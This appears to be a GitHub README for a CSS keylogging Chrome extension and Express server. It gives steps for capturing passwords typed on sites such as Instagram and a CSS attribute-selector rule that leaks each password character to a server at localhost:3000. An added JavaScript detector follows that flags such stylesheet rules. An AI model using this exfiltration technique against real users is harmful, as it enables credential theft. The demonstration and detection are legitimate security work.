CSS Keylogger

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension

  1. Download the repository: git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open the Chrome menu by clicking the icon to the far right of the Omnibox, which is three horizontal bars, and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension directory inside the directory where you downloaded this repository.

Setup Express server

  1. yarn
  2. yarn start

Haxking l33t passw0rds

  1. Open a website that uses a controlled component framework such as React, for example https://instagram.com.
  2. Press the extension icon (C) at the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the Express server.

How it works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Using a simple script, one can create a CSS file that will send a custom request for every ASCII character.
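
From the defender's side, the pattern described above is easy to look for in a stylesheet: a selector that matches on the value attribute, paired with a url() that points at another origin. The following is an added example, not code from this repository; the function names, the sample stylesheet and the page origin https://example.com are assumptions made for illustration.

```javascript
// Added example: flag CSS rules that pair a value-matching attribute selector
// with a url() on another origin. Heuristic, regex-based, not a full CSS parser.

// Matches [value=...], [value^=...], [value$=...], [value*=...] and similar.
const VALUE_SELECTOR = /\[\s*value\s*[\^$*~|]?=/i;
// Captures the target of each url(...) in a declaration block.
const URL_FN = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;

// Strip comments so they cannot hide or split a selector.
function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, "");
}

// True when the url() target resolves to a different origin than the page.
function isCrossOrigin(target, pageOrigin) {
  try {
    return new URL(target, pageOrigin).origin !== new URL(pageOrigin).origin;
  } catch {
    return true; // unparsable target: treat as suspicious
  }
}

// Returns [{selector, url}] for every suspicious rule in the stylesheet text.
function findValueExfilRules(css, pageOrigin) {
  const findings = [];
  const rule = /([^{}]+)\{([^{}]*)\}/g; // flat rules; also matches inside @media
  for (const [, selector, body] of stripComments(css).matchAll(rule)) {
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const [, , target] of body.matchAll(URL_FN)) {
      if (isCrossOrigin(target, pageOrigin)) {
        findings.push({ selector: selector.trim(), url: target });
      }
    }
  }
  return findings;
}

// Constructed sample: the rule from this page plus two benign rules.
const SAMPLE_CSS = `
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
input[type="text"] { background-image: url("/img/search.png"); }
input[value=""] { background: url(/img/empty.png); }
`;

console.log(findValueExfilRules(SAMPLE_CSS, "https://example.com"));
```

Only the first rule in the sample is reported; the same-origin images and the selector without a value match are ignored.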
